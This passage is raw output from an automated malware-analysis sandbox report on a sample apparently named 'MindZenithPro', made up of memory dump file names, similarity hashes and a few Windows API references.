                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: FindMessagePostSleepWindow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 529655941-2988720461
                                    • Opcode ID: 41df2f8df7be6972bbf82de7d28ad1b74a0782ff7b5b684c28367c6f6e899c31
                                    • Instruction ID: 882bc6fe7cb0f2556eeba1cff841f75e0bcb9ce38f311de72b64fe0a099b58ff
                                    • Opcode Fuzzy Hash: 41df2f8df7be6972bbf82de7d28ad1b74a0782ff7b5b684c28367c6f6e899c31
                                    • Instruction Fuzzy Hash: 7FD0A9317803107AF2346731AC0AFC6AA109F04B02F20082A7205AA2C2C9A4A800820C
                                    Function 003FC14E Relevance: 5.1, APIs: 4, Instructions: 139COMMON
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 003FC1E4
                                    • GetLastError.KERNEL32 ref: 003FC1F2
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 003FC24D
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide$ErrorLast
                                    • String ID:
                                    • API String ID: 1717984340-0
                                    • Opcode ID: 229bb33fcec04807fceccb982fddd9af4a9fb783a4379b1c7d8d39f1a58d28fb
                                    • Instruction ID: ff3bc0daa805620c71891c71714994be4780538dba084973fe319460187cc91a
                                    • Opcode Fuzzy Hash: 229bb33fcec04807fceccb982fddd9af4a9fb783a4379b1c7d8d39f1a58d28fb
                                    • Instruction Fuzzy Hash: 5441073165024DBFCF239FE4CA44ABA7BA9EF02720F265569FE595B1A1DB308D01C750